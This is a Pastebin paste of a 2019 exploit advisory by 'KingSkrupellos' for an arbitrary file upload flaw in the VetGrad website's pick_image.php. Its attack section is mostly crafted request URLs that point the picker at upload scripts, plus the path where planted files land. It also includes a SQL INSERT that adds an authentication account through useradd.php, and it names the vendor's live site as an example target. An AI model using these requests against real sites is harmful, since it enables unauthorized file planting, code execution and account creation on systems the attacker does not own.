Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ##################################################################################
- # Exploit Title : VetGrad England Unauthorized File Insertation
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 06/03/2019
- # Vendor Homepage : vetgrad.com
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ##################################################################################
- # Impact :
- ***********
- VetGrad is prone to an arbitrary file upload vulnerability. An attacker may leverage this issue to
- upload arbitrary files to the affected computer; this can result in arbitrary code execution within the
- context of the vulnerable application. Weaknesses in this category are related to the
- management of permissions, privileges, and other security features that are used to perform access control.
- ##################################################################################
- # Information :
- **************
- Browse URL
- This dialogue helps you select a URL for an image to be included in a page, or for the target of a hypertext link.
- There are three options open to you:
- Upload a file to the VetGrad website, and use it as the target;
- Use the URL of an existing file on the VetGrad site; or
- Type or paste the URL into the URL field if the target is on another site.
- Once you have done one of these three, press the Submit button, or to abandon the operation, press the Cancel button.
- ##################################################################################
- # Exploit :
- *********
- /pick_image.php?dir=img/logos/www.vetstart.org/wp-content/&textfieldid=&imagefieldid=
- /pick_image.php?dir=.&url=https://media.gradvet.com/img/upload_file.php&textfieldid=&imagefieldid=
- /pick_image.php?dir=.&url=https://media.gradvet.com/img/upload_file_old.php&textfieldid=&imagefieldid=
- /pick_image.php?dir=.&url=https://media.gradvet.com/img/upload_image.php&textfieldid=&imagefieldid=
- /pick_image.php?dir=.&url=https://media.gradvet.com/img/upload_logo.php&textfieldid=&imagefieldid=
- /pick_image.php?dir=.&url=https://media.gradvet.com/img/upload_logo_file.php&textfieldid=&imagefieldid=
- # Directory File Path :
- ********************
- /img/logos/www.[DOMAINNAME].org/wp-content/themes/[YOURFILNAME].html
- ##################################################################################
- VULNERABLESITE/useradd.php
- INSERT INTO mysql_auth SET username='', passwd='$1$PcRACb7v$0QysWGq5be5tyvOA0k5l80', email='' ;
- ##################################################################################
- # Example Vulnerable Sites :
- *************************
- [+] vetgrad.com/pick_image.php?dir=img/logos/www.vetstart.org/wp-content/&textfieldid=&imagefieldid=
- [+] vetgrad.com/pick_image.php?dir=.&url=https://media.gradvet.com/img/upload_file.php&textfieldid=&imagefieldid=
- ##################################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ##################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement